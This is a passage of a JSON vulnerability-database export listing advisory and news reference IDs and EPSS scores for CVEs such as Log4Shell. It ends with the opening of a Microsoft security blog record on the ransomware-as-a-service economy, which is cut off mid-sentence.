"RAPID7BLOG:05A653A5E863B78EDD56FD74F059E02E", "RAPID7BLOG:078D5EE222682A75AE1A1A3A3684E38D", "RAPID7BLOG:0C5C51ED53983B92C7C9805E820366C9", "RAPID7BLOG:18CF89AA3B9772E6A572177134F45F3A", "RAPID7BLOG:18D49792276E208F17E7D64BCE2FDEF6", "RAPID7BLOG:1D39E7BBA13704DCBB8153C89ABE6B72", "RAPID7BLOG:24E0BE5176F6D3963E1824AD4A55019E", "RAPID7BLOG:2FC92FBE5A4445611C80C7C3FA7D9354", "RAPID7BLOG:2FFDE45F01FA44216BE91DD7AFA0D060", "RAPID7BLOG:45B045D2EE21432DF9939E4402522BFC", "RAPID7BLOG:4CDB288231FA4BF52C0067D9D4FEABBF", "RAPID7BLOG:5109AC30126DB59333F13ED32F7F4713", "RAPID7BLOG:5482AC1594C82A230828023816657B57", "RAPID7BLOG:5721EC0F74BC2FA3F661282E284C798A", "RAPID7BLOG:5CDF95FB2AC31414FD390E0E0A47E057", "RAPID7BLOG:602109CBDD808C41E4DDC9FBC55E144D", "RAPID7BLOG:6A1F743B64899419F505BFE243BD179F", "RAPID7BLOG:6EADCD983283E3D546EF2907978E95F1", "RAPID7BLOG:7767347A5784FF1C4901601A1A21D2C8", "RAPID7BLOG:7B1DD656DC72802EE7230867267A5A16", "RAPID7BLOG:7F1312E79E0925118565C90443170051", "RAPID7BLOG:97E3CA7ED938F3DF6E967C832F314FA3", "RAPID7BLOG:9CB105938BDE92F573A2DE68BC20CF46", "RAPID7BLOG:AB5C0BC130F45073226CC41D25680EA0", "RAPID7BLOG:AE824D3989C792700A622C455D8EE160", "RAPID7BLOG:AF9E6199C63A57B22FAE6AAEDD650D39", "RAPID7BLOG:B6DE24165AA9AA83EDA117170EDDAD44", "RAPID7BLOG:BE60EE9A1ACB3CEE4593041ECAFA8D95", "RAPID7BLOG:C6C1B8357ABD28AEB0F423A0A099098A", "RAPID7BLOG:C90DF07E98E436DFBFCC5BA576D21019", "RAPID7BLOG:CB62092B4C7E70876CF276BA04DD7597", "RAPID7BLOG:CC071AA6971D64B0F7A596B2BBD5F046", "RAPID7BLOG:D185BF677E20E357AFE422CFB80809A5", "RAPID7BLOG:D1E1A150733F5AFC2C704DB26E7EAB30", "RAPID7BLOG:D47FB88807F2041B8820156ECFB85720", "RAPID7BLOG:E3D08ECAA9A93569D5544F4D6AAEEB74", "RAPID7BLOG:E43819A7DE1DD0F60E63E67A27B9301B", "RAPID7BLOG:ED80467D2D29D8DC10E754C9EA19D9AD", "RAPID7BLOG:F14526C6852230A4E4CF44ADE151DF49", "RAPID7BLOG:F14E17E573386DB3DDD27A8E829E49A1", "RAPID7BLOG:F37BD0C67170721734A26D15E6D99B3E", "RAPID7BLOG:F4F1A7CFCF2440B1B23C1904402DDAF2", "RAPID7BLOG:F76EF7D6AB9EB07FC8B8BCE442DC3A69", "RAPID7BLOG:F9B4F18ABE4C32CD54C3878DD17A8630", "RAPID7BLOG:FB97B7B381BE98BE0077666DFDEC1953", "RAPID7BLOG:FBEE52CB3C438E4C42D6212E07BEFEA9"]}, {"type": "redhat", "idList": ["RHSA-2021:5093", "RHSA-2021:5094", "RHSA-2021:5106", "RHSA-2021:5107", "RHSA-2021:5108", "RHSA-2021:5126", "RHSA-2021:5127", "RHSA-2021:5128", "RHSA-2021:5129", "RHSA-2021:5130", "RHSA-2021:5132", "RHSA-2021:5133", "RHSA-2021:5134", "RHSA-2021:5137", "RHSA-2021:5138", "RHSA-2021:5140", "RHSA-2021:5141", "RHSA-2021:5148", "RHSA-2021:5183", "RHSA-2021:5184", "RHSA-2021:5186", "RHSA-2022:0082", "RHSA-2022:0083", "RHSA-2022:0203", "RHSA-2022:0205", "RHSA-2022:0216", "RHSA-2022:0222", "RHSA-2022:0223", "RHSA-2022:0296", "RHSA-2022:1296", "RHSA-2022:1297", "RHSA-2022:1299"]}, {"type": "redhatcve", "idList": ["RH:CVE-2021-4104", "RH:CVE-2021-4125", "RH:CVE-2021-44228", "RH:CVE-2021-44832", "RH:CVE-2021-45046", "RH:CVE-2021-45105"]}, {"type": "saint", "idList": ["SAINT:1AF7483E5B4DB373D9449DD910472EA5", "SAINT:67BEB8C11AAB63038EBD6BD535D548D7", "SAINT:C857C9B9FEF5E0F807DAAB797C3B2D87"]}, {"type": "securelist", "idList": ["SECURELIST:094B9FCE59977DD96C94BBF6A95D339E", "SECURELIST:11665FFD7075FB9D59316195101DE894", "SECURELIST:29152837444B2A7E5A9B9FCB107DAB36", "SECURELIST:35644FF079836082B5B728F8E95F0EDD", "SECURELIST:5147443B0EBD7DFCCB942AD0E2F92CCF", "SECURELIST:52D1B0F6F56EE960CC02B969556539D6", "SECURELIST:63306FA6D056BD9A04969409AC790D84", "SECURELIST:7A375F44156FACA25A0B3990F2CD73C1", "SECURELIST:86368EF0EA7DAA3D2AB20E0597A62656", "SECURELIST:934E8AA177A27150B87EC15F920BF350", "SECURELIST:9CC623A02615C07A9CEABD0C58DE7931", "SECURELIST:C50F1C7ECAFB8BD5FDEDAA29493B81A6", "SECURELIST:C540EBB7FD8B7FB9E54E119E88DB5C48", "SECURELIST:DF3251CC204DECD6F24CA93B7A5701E1", "SECURELIST:E21F9D6D3E5AFD65C99FC385D4B5F1DC"]}, {"type": "srcincite", "idList": ["SRC-2020-0011"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2021:1577-1", "OPENSUSE-SU-2021:1586-1", "OPENSUSE-SU-2021:1601-1", "OPENSUSE-SU-2021:1613-1", "OPENSUSE-SU-2021:3999-1", "OPENSUSE-SU-2021:4094-1", "OPENSUSE-SU-2021:4107-1", "OPENSUSE-SU-2021:4109-1"]}, {"type": "symantec", "idList": ["SMNTC-106914", "SMNTC-111238", "SMNTC-19793"]}, {"type": "talosblog", "idList": ["TALOSBLOG:0043F629DC5E8DA26934B2407F1C76CC", "TALOSBLOG:0AA83DE1427426ABF4723FDF049F6EEB", "TALOSBLOG:7192A351B37E9A67C1A5DB760A14DA7E", "TALOSBLOG:AB5E63755953149993334997F5123794", "TALOSBLOG:C73CDA82B845335B5DCC8A94FB5662D8", "TALOSBLOG:D7662F18F14544FB63C58CB527CC3A4A"]}, {"type": "thn", "idList": ["THN:0E6CD47141AAF54903BD6C1F9BD96F44", "THN:166AAAF7F04EF01C9E049500387BD1FD", "THN:1678C3AE3BCB0278860461A943C3DF30", "THN:1D10167F5D53B2791D676CF56488D5D9", "THN:1ED1BB1B7B192353E154FB0B02F314F4", "THN:25143CA85A0297381CEBBBD35F24F85B", "THN:2656971C06C4E3D4B0A8C0AC02BBB775", "THN:3266EB2F73FA4A955845C8FEBA4E73C5", "THN:365025B2416483B34C70F02EDA44131E", "THN:368B6517F020AB4BF1B2344EDC8234A4", "THN:3E9680853FA3A677106A8ED8B7AACBE6", "THN:42A0EFDB5165477E18333E9EE1A81D8E", "THN:461B7AEC7D12A32B4ED085F0EA213502", "THN:46994B7A671ED65AD9975F25F514C6E3", "THN:4DE731C9D113C3993C96A773C079023F", "THN:4E80D9371FAC9B29044F9D8F732A3AD5", "THN:4F47385B2D66DCA6F584F23C5F1AE0D0", "THN:59AE75C78D4644BFA6AD90225B3DE0C1", "THN:5BAE3325983F971D1108722C454FF9AB", "THN:5BE77895D84D1FB816C73BB1661CE8EB", "THN:5CB7AEBFFE369D293598A4FDBFDFCEE3", "THN:602D65D576B090BAC4B0C96998F8F922", "THN:603F844B99A1CC0CF1DE580659626B57", "THN:668DE2C9CFD709125451AF8F3FE12E6C", "THN:67ECC712AB360F5A56F2434CDBF6B51F", "THN:686DDFA07B415C41BA7AB9B8970557EF", "THN:6ED39786EE29904C7E93F7A0E35A39CB", "THN:76D7572EDBE770410D6F0518DAD8B0AD", "THN:7958F9B1AA180122992C6A0FADB03536", "THN:80D2DBC4130D9FF314BDC4C19EB5CD4E", "THN:81F8A577F12DD54CE019C36458B14B52", "THN:833B2B9623F1C64D20868B947E8BE4E0", "THN:83D31EE6B3E59778D812B3B7E67D7CD6", "THN:8483C1B45A5D7BF5D501DE72F5898935", "THN:84E53E1CA489F43A3D68EC1B18D6C2E2", "THN:87AE96960D76D6C84D9CF86C2DDB837C", "THN:8A60310AB796B7372A105B7C8811306B", "THN:8BA951AD00E17C72D6321234DBF80D19", "THN:91A2A296EF8B6FD5CD8B904690E810E8", "THN:933FE23273AB5250B949633A337D44E1", "THN:959FD46A8D71CA9DDAEDD6516113CE3E", "THN:9994A9D5CFB76851BB74C8AD52F3DBBE", "THN:9FB8DE3BF545932321335F2C525A4A36", "THN:A5E2056B783A702B2A37C7ECD02B811F", "THN:AE2E46F59043F97BE70DB77C163186E6", "THN:AFF2BD38CB9578D0F4CA96A145933627", "THN:B95DC27A89565323F0F8E6350D24D801", "THN:BD014635C5F702379060A20290985162", "THN:C3B82BB0558CF33CFDC326E596AF69C4", "THN:C4188C7A44467E425407D33067C14094", "THN:C73B84809CDC20C90C26FF1B7F56F5D4", "THN:D0592A04885C26716DF385AE8ABF8401", "THN:D4E86BD8938D3B2E15104CA4922A51F8", "THN:DABC62CDC9B66962217D9A8ABA9DF060", "THN:E27BF56DBA34B1A89BD29AEB5A6D8405", "THN:E7762183A6F7B3DDB942D3F1F99748F6", "THN:E7E8D45492BAD83E88C89D34F8502485", "THN:E9454DED855ABE5718E4612A2A750A98", "THN:E95B6A75073DA71CEC73B2E4F0B13622", "THN:EAEDDF531EB90375B350E1580DE3DD02", "THN:EB3F9784BB2A52721953F128D1B3EAEC", "THN:ECDABD8FB1E94F5D8AFD13E4C1CB5840", "THN:F25FAD25E15EBBE4934883ABF480294D", "THN:F35E41E26872B23A7F620C6D8F7E2334", "THN:FA40708E1565483D14F9A31FC019FCE1", "THN:FA7EFA3A74BF3490AD84EA169EA6C4CA", "THN:FBDAEC0555EDC3089DC0966D121E0BCE", "THN:FCBB400B24C7B24CD6B5136FA8BE38D3"]}, {"type": "threatpost", "idList": ["THREATPOST:02A472487653A461080415A3F7BB23D2", "THREATPOST:03FC9E97BBF9730C5990E8A220DD5E9A", "THREATPOST:065F7608AC06475E765018E97F14998D", "THREATPOST:075BA69792AA7B1AE4C28E1CBE61E360", "THREATPOST:08E51C6FB9418179611DF2ACFB1073BF", "THREATPOST:09118C676E28AC5D7BB791E76F75453C", "THREATPOST:0B290DDF3FE14178760FDC2229CB1383", "THREATPOST:0C3BAA4DB9E2B5E8A30DD20A987FCE03", "THREATPOST:0FD7F2FA7F2D3383F582553124EA843D", "THREATPOST:10245D9804511A09607265485D240FFF", "THREATPOST:10D0F1DDDD6C211DA3CE6395900B7C54", "THREATPOST:1309DBA0F8A2727965C6FA284A002D3B", "THREATPOST:138507F793D8399AF0EE1640C46A9698", "THREATPOST:138F67583DAC26A61D1AB90A018F1250", "THREATPOST:13D4AE4C03A3BF687491FDA1E8D732C7", "THREATPOST:14D52B358840B9265FED987287C1E26E", "THREATPOST:157F244C629A1657480AFA561FF77BE4", "THREATPOST:163B67EFAB31CDAD34D25B9194438851", "THREATPOST:16624FA0DF55AAB9FDB3C14AC91EC9F5", "THREATPOST:16877B149E701CC4DB69E91C567D79CC", "THREATPOST:16A4E4FD8C0D84305D5ABABEBBC6343E", "THREATPOST:187B01687ED5D3975CD6E42E84DD9B13", "THREATPOST:18D24326B561A78A05ACB7E8EE54F396", "THREATPOST:199785A97C530FECDF2B53B871FBE1C2", "THREATPOST:19BDD881931703B28F7B93492E0C75FD", "THREATPOST:1A553B57472BB0EB8D69F573B510FDE6", "THREATPOST:1B42481449E86FEA3940A2E1E2634309", "THREATPOST:1BE6320CDA6342E72A5A2DD5E0758735", "THREATPOST:1CC682A86B6D521AD5E357B9DB3A1DFB", "THREATPOST:1EB961A6936CB97E2DE6C0212349367F", "THREATPOST:1F99A9A6A418194B87E5468CC8344FBF", "THREATPOST:1FB73160B6AAB2B0406816BB6A61E4CB", "THREATPOST:2018FCCB3FFD46BACD36ADBC6C9013CE", "THREATPOST:20F9B8CE2D092108C0F78EC3E415F6B4", "THREATPOST:215937631A8626A30B0695671AD4B357", "THREATPOST:2188E3E33D86C2C3DF35253A3ED7FA6C", "THREATPOST:2243706D17F2A1E930A00F49D8E30720", "THREATPOST:2246F7085606B44A031DC14D1B54B9DB", "THREATPOST:23B6C10D7EF469BE8ED27D1C9AFB526A", "THREATPOST:2707644CA0FB49ADD0ECA1B9AFDA0E8A", "THREATPOST:27C5AA551B5793DEA8848FB76DE52B32", "THREATPOST:280ACEC9B5A634E74F3C321F272C3EF3", "THREATPOST:29D66B3C46A57CA3A0E13D7361812077", "THREATPOST:2BD1A92D071EE3E52CB5EA7DD865F60A", "THREATPOST:2C0E12580D3C2F1CE7880F6955D4AA1E", "THREATPOST:2D47D18D36043D4DFBFAD7C64345410E", "THREATPOST:2DFBDDFFE3121143D95705C4EA525C7A", "THREATPOST:2E607CF584AE6639AC690F7F0CE8C648", "THREATPOST:305513A61FA2B0EF500854C82DF34A9C", "THREATPOST:31091088EDBCEEF43F75A2BA2387EB5C", "THREATPOST:31D14CEE5977BF71F79F7C30AEC10698", "THREATPOST:33E56DEB736406F9DD08C7533BF1812B", "THREATPOST:34D98758A035C36FED68DDD940415845", "THREATPOST:354BF51EC880C48C85D9302EDB1227D6", "THREATPOST:35A43D6CB9FAF8966F5C0D20045D1166", "THREATPOST:3697F9293A6DFF6CD5927E9E68FF488A", "THREATPOST:38E044431D55F0A4BC458FF92EB025BF", "THREATPOST:38E8D69F26ADB15A989532924B2A98C4", "THREATPOST:3A1C8593C0AAEFA3AF77D1A207BD0B65", "THREATPOST:3A5F59D56E40560C393A3F69A362A31B", "THREATPOST:3ADFDD3CC93B03F83C2CEC5583B016AB", "THREATPOST:3B06E49AA3C9F001C97038682A9BF73F", "THREATPOST:3B8B02F621E9D9883A541B1B26BDF410", "THREATPOST:3C3F20C93519036CC712D1CA3A6D7C48", "THREATPOST:3CC83DBBAFE2642F4E6D533DDC400BF6", "THREATPOST:3DB85AFFEA9491ACBD8909D0CF5FBAEA", "THREATPOST:3E47C166057EC7923F0BBBE4019F6C75", "THREATPOST:3EDC338ECB2601F5A49A9ED5E087B776", "THREATPOST:3FDED0EC415BA165368B72AB2A8E1A59", "THREATPOST:40A09F08F388BACF08E0931C6473DE0C", "THREATPOST:40A6B1288BA6177BA30307804BE630D0", "THREATPOST:41B10746D1F4B74DA188CB140A8B2676", "THREATPOST:42AAB266C740220CFF57204DDF71129E", "THREATPOST:436D209F4CB01B99FC9576DFE08DE145", "THREATPOST:45B63C766965F5748AEC30DE709C8003", "THREATPOST:46837E7270195429E1D891848E911254", "THREATPOST:46AF5D5C752ADF689DA52FBDA4644F5D", "THREATPOST:47481707E9A4BF7FC15CC47EC8A8F249", "THREATPOST:48A631F2D45804C677BB672F838F29DA", "THREATPOST:48D622E76FCC26F28B32364668BB1930", "THREATPOST:48FD4B4BFA020778797D684672C283B0", "THREATPOST:49177F7B5015CE94637C97F64C2D4138", "THREATPOST:4B2E19CAF27A3EFBCB2F777C6E528317", "THREATPOST:4B8076F30D5D67336733D7FFBCBD929A", "THREATPOST:4C8D995307A845304CF691725B2352A2", "THREATPOST:4C9E0FFA5C914E395A66D2DC65B16649", "THREATPOST:4D63851D1493E3861204B674ADBC7F01", "THREATPOST:4D892A0342695D6703703D63DCC1877C", "THREATPOST:4EEFA1A0FABB9A6E17C3E70F39EB58FE", "THREATPOST:503327A6AB0C76621D741E281ABCFF77", "THREATPOST:51A2EB5F46817EF77631C9F4C6429714", "THREATPOST:52923238811C7BFD39E0529C85317249", "THREATPOST:5531DA413E023731C17E5B0771A25B3D", "THREATPOST:55873F60362AA114632D0D7DC95FF63C", "THREATPOST:558A7B1DE564A8E368D33E86E291AB77", "THREATPOST:575F655420B93C2305DEE73F769E7E0B", "THREATPOST:57F52943964BADEBC748C4AC796CEEB6", "THREATPOST:590E1D474E265F02BA634F492F728536", "THREATPOST:5B680BEF3CD53FFB3B871FF7365A4C47", "THREATPOST:5B9D3D8DB4BFEDE846215C1877B275ED", "THREATPOST:5C1E777F8F9FC173EF97E95D8AFAA5F2", "THREATPOST:5CCE0C2607242B16B2880B331167526C", "THREATPOST:5F6690E820E1B143D99DD5974300C6FF", "THREATPOST:604B67FD6EFB0E72DDD87DF07C8F456D", "THREATPOST:6067B6D35C99BFCFF226177541A31F69", "THREATPOST:62DC935BF4DB4EF8A4F1E83519B1D5CD", "THREATPOST:63D2355B6EF0B975846E034876BC66DF", "THREATPOST:647D7D894452D9C46B3E86F5491EED49", "THREATPOST:65DB14FD89BCDBD3391ADD70F1377E70", "THREATPOST:65F4E74D349524EBAC2DA4A4ECF22DD8", "THREATPOST:6675B640474BF8A8A3D049DB0266A118", "THREATPOST:66848A3C9B8917C8F84DFDC04DD5F6D9", "THREATPOST:68B92CE2FE5B31FB78327BDD0AB7F21C", "THREATPOST:68F4D33A0EE100B39416EDC76C3A3C9F", "THREATPOST:6C547AAC30142F12565AB289E211C079", "THREATPOST:6D28B6E17A92FE11F55907C143B3F5DD", "THREATPOST:6D61C560E85ECD0A7A35C55E74849510", "THREATPOST:705B9DD7E8602B9F2F913955E25C2550", "THREATPOST:71C45E867DCD99278A38088B59938B48", "THREATPOST:751A0E2371F134F90F39C20AB70C1E2A", "THREATPOST:76A072EE53232EB197F119EC2F7EAA74", "THREATPOST:76A5549135F9D578FFC2C8FACC135193", "THREATPOST:77DB31E826E03EA9D78EE4777986EA49", "THREATPOST:78327DA051387C43A61D82DE6B618D1F", "THREATPOST:795C39123EE147B39072C9434899E8FE", "THREATPOST:796DFA4804FEF04D3787893FCDFF97D2", "THREATPOST:7DDE7BA7A7916763BDDB5D0C565285DA", "THREATPOST:7E76268AD6AABF30EEE441619FF98ABF", "THREATPOST:81021088670E95FC0EBB2F53E1FB2AD2", "THREATPOST:8105FA1422BB4E02CD95C23CC7405E26", "THREATPOST:816C2C5C3414F66AD1638248B7321FA1", "THREATPOST:81DEAED9A2A367373ADA49F1CCDCA95D", "THREATPOST:8243943141B8F18343765DA77D33F46C", "THREATPOST:83C349A256695022C2417F465CEB3BB2", "THREATPOST:8594A8F12FC5C97E7E62AF7B9BE3F1AA", "THREATPOST:8601D6EF6AB3201E582A218391B19C3F", "THREATPOST:8648A1E46B6EBE5300881DE285C7D080", "THREATPOST:883A7DED46A4E1C743AFFBA7CDCF4400", "THREATPOST:88C99763683E42B94F1E7D307C0D9904", "THREATPOST:89AA48C3C48FA427AB660EDEE6DBCBE2", "THREATPOST:8A372065BFA1E6839DAF0386E9D8A1F5", "THREATPOST:8A56F3FFA956FB0BB2BB4CE451C3532C", "THREATPOST:8B78588647E8548B06361DBB1F279468", "THREATPOST:8C45AF2306CB954ACB231C2C0C5EDA9E", "THREATPOST:8D57BD39C913E8DDC450DD9EF2564C2C", "THREATPOST:8D6D4C10987CBF3434080EFF240D2E74", "THREATPOST:8E47F9D5A51C75BA6BB0A1E286296563", "THREATPOST:8FFF44C70736D8E21796B9337E52F29D", "THREATPOST:905F5C5FE38CC3228FF94F798221B3D5", "THREATPOST:932AA74F12B9D2AD0E8589AC1A2C1438", "THREATPOST:9374ECD9CCFC891FC2F3B85DF0905A1C", "THREATPOST:93F1D3DD89A41A41475737BF84F8146C", "THREATPOST:95BDCA2096B58A0697E169C01B1E0F09", "THREATPOST:9688E067E5F287042D4EBC46107C66AF", "THREATPOST:970C9E73DF1FF53D70DB0B66326F3CB0", "THREATPOST:97D06649A596B5E25E2A11E3D275748B", "THREATPOST:97F7CB48069CDF8038E5E49508EFA458", "THREATPOST:987673B6BC03D7371ADC88E9BDA270D5", "THREATPOST:98F735BF442C3126E4A9FFBB60517B96", "THREATPOST:9922BFA77AFE6A6D35DFEA77A4D195C0", "THREATPOST:99610F4016AECF953EEE643779490F30", "THREATPOST:99C6C1555ACD07B4925765AED21A360C", "THREATPOST:9D96113FADFD4FBCA9C17B78B53A8C93", "THREATPOST:9E222E9232D1D59183559B17E97BADCD", "THREATPOST:A07707C9B30B86A691C1A24C4DC65EE6", "THREATPOST:A1F3E8AC4878C11E48F90AC47D165F52", "THREATPOST:A298611BE0D737083D0CFFE084BEC006", "THREATPOST:A2FE619CD27EBEC2F6B0C62ED026F02C", "THREATPOST:A6096ACCB3F0C38BC6570E1DDE3E8844", "THREATPOST:A98C64CB9BDDE55F51C984B749753904", "THREATPOST:AB0F3CD65F9FE00689C1695CB89ADC3F", "THREATPOST:AB2F6BF7F6EC16383E737E091BA9385B", "THREATPOST:AB54F1EB518D88546D1EF9DBA5E1874B", "THREATPOST:AD4EF56E5440159F6E37D8B403C253D7", "THREATPOST:AD8A075328874910E8DCBC149A6CA284", "THREATPOST:AE9B4708A7A9B6F3A24C35E15C6150A4", "THREATPOST:AFD74E86954C5A08B3F246887333BDF3", "THREATPOST:B04DD1402960F4726546F62371A02B3C", "THREATPOST:B11E42D0B4C56E4CC482DEF6EA0B4AC7", "THREATPOST:B2DDD79594EACBEAC10B02C533235986", "THREATPOST:B2FEDF3EA50507F526C77105093E8977", "THREATPOST:B318814572E066732E6C32CC147D95E2", "THREATPOST:B3A92C43D5FF3C53BE8EF06C687B80B6", "THREATPOST:B53DDA5AD9C6530F631391E064A0D4FA", "THREATPOST:B796D491D9E59A6CE14A74FFE427D175", "THREATPOST:B7C8B7F3016D73355C4ED5E05B0E8490", "THREATPOST:B7F31FCDC8936516C077D39FEF9235AA", "THREATPOST:B956AABD7A9591A8F25851E15000B618", "THREATPOST:B9CCF4B8B7E25CEC369B248303882707", "THREATPOST:BA0FA5036C385C822C787514850A67E5", "THREATPOST:BDCC3D007E103708BD7CA085B29EF2CB", "THREATPOST:BE0B5E93BD5FBBCB893FDDFE5348FDE9", "THREATPOST:BE11CFFFFEA1B470C8A24CA24D76A7C6", "THREATPOST:C3C8E90FB9A6A06B1692D70A51973560", "THREATPOST:C4369D60DE77B747298623D4FD0299B3", "THREATPOST:C4B358E42FF02B710BE90F363212C84F", "THREATPOST:C535D98924152E648A3633199DAC0F1E", "THREATPOST:C573D419AD6106E6579CCA4A18E2DBBE", "THREATPOST:C694354BA14A953DAFC9171CB97F0BC2", "THREATPOST:C6D292755B4D35E7E0FD459BBF6AFC7F", "THREATPOST:C754ECCAF3F8A3E6BCD670A88B3E4CAA", "THREATPOST:C9D2DB62AC17B411BFFF253D149E56F2", "THREATPOST:C9FBCC2A1C52CDB54C6AAB18987100F4", "THREATPOST:CAA9AA939562959323A4675228C233A5", "THREATPOST:CD9589D22198CE38A27B7D1434FEE963", "THREATPOST:CEEE25A4A4491980FA1ECB491795DBA9", "THREATPOST:CF3033203781AAC4EAAE83DDCF93ADE8", "THREATPOST:CF4E98EC11A9E5961C991FE8C769544E", "THREATPOST:CF93F3E6D1E96AACFAEE9602C90A711D", "THREATPOST:D098942E4435832E619282E1B92C9E0F", "THREATPOST:D240DF7FEF328139784DBE743FF84E9B", "THREATPOST:D358CF7B956451F0C53F878AF811409F", "THREATPOST:D5E02B5FD2809DCACF41DA1190794921", "THREATPOST:D7D5E283A1FBB50F8BD8797B0D60A622", "THREATPOST:D7E3369CE997E9EF8A0586B994225257", "THREATPOST:DB4349EAC3DD60D03D1EBDEFF8ABAA8E", "THREATPOST:DC76A72269F271882F45A521CF7C3509", "THREATPOST:DD0FE8D3D9D205FA5CCA65C3EBDD62D2", "THREATPOST:DE6A0C7ECE2973F596891B00DC078055", "THREATPOST:DF2C6B28792FEC8F2404A7DC366B848F", "THREATPOST:E09CE3FA2B76F03886BA3C2D4DB4D8DB", "THREATPOST:E0C8A3622AEF61D726EED997C39BADFE", "THREATPOST:E424D9CD1C692F91FBD97FDDEDBCCE34", "THREATPOST:E60D2D0CCA5A225CA4BF5CEB5C7C3F59", "THREATPOST:E8074A338A246BED98CF95AD4F4E9CAF", "THREATPOST:E8A3AD011F9759F38AAB48D776396878", "THREATPOST:EC28F82F6C3ECD5D0BA7471D5BA50FD6", "THREATPOST:EDFBDF12942A6080DE3FAE980A53F496", "THREATPOST:EE0A71A925297032000651C344890BDD", "THREATPOST:F084C5D91E4F66092F5449922C34C4CE", "THREATPOST:F12423DD382283B0E48D4852237679FC", "THREATPOST:F72FDE7CB5D697EFD089937D42475E50", "THREATPOST:F87A6E1CF3889C526FDE8CE50A1B81FF", "THREATPOST:F8F0749C57FDD3CABE842BDFEAD33452", "THREATPOST:FADCF664C06E3747C40C200AE681FDF8", "THREATPOST:FC38FE49CDC6DFAD4E78D669DBFA5687", "THREATPOST:FDD0C98FAA16831E7A3B7CCE3BFC67FF", "THREATPOST:FDF0EE0C54F947C5167E6B227E92AE63", "THREATPOST:FE7B13B35ED49736C88C39D5279FA3D1"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:C927C873A9E9A7AF6B74D64EFAFA6B02", "TRENDMICROBLOG:E0C479F55DF4C53A47CA2170110555AE", "TRENDMICROBLOG:E17B66F8728189778826A0F497A540F2", "TRENDMICROBLOG:E3C3B5620EF807FF799CC5A969324BF2"]}, {"type": "typo3", "idList": ["TYPO3-PSA-2021-004"]}, {"type": "ubuntu", "idList": ["USN-5192-1", "USN-5192-2", "USN-5197-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2021-4104", "UB:CVE-2021-44228", "UB:CVE-2021-45046"]}, {"type": "veracode", "idList": ["VERACODE:33244", "VERACODE:33337", "VERACODE:33348"]}, {"type": "vmware", "idList": ["VMSA-2021-0028.1", "VMSA-2021-0028.10", "VMSA-2021-0028.11", "VMSA-2021-0028.12", "VMSA-2021-0028.13", "VMSA-2021-0028.2", "VMSA-2021-0028.3", "VMSA-2021-0028.4", "VMSA-2021-0028.6", "VMSA-2021-0028.7", "VMSA-2021-0028.8", "VMSA-2021-0028.9"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:060FBB90648BCDE11554492408AE89C8", "WALLARMLAB:2AAA5E62EED6807B93FB40361B4927CB", "WALLARMLAB:90D3FFE69FF928689D36310EF8B1C4F3", "WALLARMLAB:E86F01AF50087BEB03AAB46947CDE884"]}, {"type": "wordfence", "idList": ["WORDFENCE:45390D67D024DD8C963E18DAE88303B2"]}, {"type": "zdi", "idList": ["ZDI-19-181", "ZDI-21-819"]}, {"type": "zdt", "idList": ["1337DAY-ID-33133", "1337DAY-ID-33134", "1337DAY-ID-33140", "1337DAY-ID-33794", "1337DAY-ID-33806", "1337DAY-ID-33824", "1337DAY-ID-33951", "1337DAY-ID-34095", "1337DAY-ID-35525", "1337DAY-ID-36667", "1337DAY-ID-37126", "1337DAY-ID-37135", "1337DAY-ID-37136", "1337DAY-ID-37228", "1337DAY-ID-37257", "1337DAY-ID-37264", "1337DAY-ID-37889"]}]}, "epss": [{"cve": "CVE-2018-13379", "epss": "0.974950000", "percentile": "0.999510000", "modified": "2023-03-19"}, {"cve": "CVE-2019-0604", "epss": "0.974900000", "percentile": "0.999450000", "modified": "2023-03-19"}, {"cve": "CVE-2019-11510", "epss": "0.975040000", "percentile": "0.999580000", "modified": "2023-03-19"}, {"cve": "CVE-2019-19781", "epss": "0.975420000", "percentile": "0.999870000", "modified": "2023-03-19"}, {"cve": "CVE-2020-10189", "epss": "0.971730000", "percentile": "0.996370000", "modified": "2023-03-19"}, {"cve": "CVE-2020-8243", "epss": "0.004870000", "percentile": "0.722970000", "modified": "2023-03-19"}, {"cve": "CVE-2020-8260", "epss": "0.006580000", "percentile": "0.763880000", "modified": "2023-03-19"}, {"cve": "CVE-2021-20016", "epss": "0.025310000", "percentile": "0.885040000", "modified": "2023-03-19"}, {"cve": "CVE-2021-22893", "epss": "0.970000000", "percentile": "0.995360000", "modified": "2023-03-19"}, {"cve": "CVE-2021-22894", "epss": "0.002930000", "percentile": "0.643540000", "modified": "2023-03-19"}, {"cve": "CVE-2021-22899", "epss": "0.002150000", "percentile": "0.578210000", "modified": "2023-03-19"}, {"cve": "CVE-2021-22900", "epss": "0.003620000", "percentile": "0.679790000", "modified": "2023-03-19"}, {"cve": "CVE-2021-31207", "epss": "0.971850000", "percentile": "0.996470000", "modified": "2023-03-19"}, {"cve": "CVE-2021-40444", "epss": "0.966120000", "percentile": "0.993310000", "modified": "2023-03-19"}, {"cve": "CVE-2021-44228", "epss": "0.975780000", "percentile": "0.999980000", "modified": "2023-03-19"}], "vulnersScore": 0.4}, "_state": {"dependencies": 1659994789, "score": 1684014194, "epss": 1679291388}, "_internal": {"score_hash": "44d732edc4178495353fa4554bb5df83"}}
{"mssecure": [{"lastseen": "2022-05-09T15:51:15", "description": "Microsoft processes 24 trillion signals every 24 hours, and we have blocked billions of attacks in the last year alone. Microsoft Security tracks more than 35 unique ransomware families and 250 unique threat actors across observed nation-state, ransomware, and criminal activities.\n\nThat depth of signal intelligence gathered from various domains\u2014identity, email, data, and cloud\u2014provides us with insight into the gig economy that attackers have created with tools designed to lower the barrier for entry for other attackers, who in turn continue to pay dividends and fund operations through the sale and associated \u201ccut\u201d from their tool\u2019s success.\n\nThe cybercriminal economy is a continuously evolving connected ecosystem of many players with different techniques, goals, and skillsets. In the same way our traditional economy has shifted toward gig workers for efficiency, criminals are learning that there\u2019s less work and less risk involved by renting or selling their tools for a portion of the profits than performing the attacks themselves. This industrialization of the cybercrime economy has made it easier for attackers to use ready-made penetration testing and other tools to perform their attacks.\n\nWithin this category of threats, Microsoft has been tracking the trend in the ransomware-as-a-service (RaaS) gig economy, called [human-operated ransomware](<https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/>), which remains one of the most impactful threats to organizations. We coined the industry term \u201chuman-operated ransomware\u201d to clarify that these threats are driven by humans who make decisions at every stage of their attacks based on what they find in their target\u2019s network.\n\nUnlike the broad targeting and opportunistic approach of earlier ransomware infections, attackers behind these human-operated campaigns vary their attack patterns depending on their discoveries\u2014for 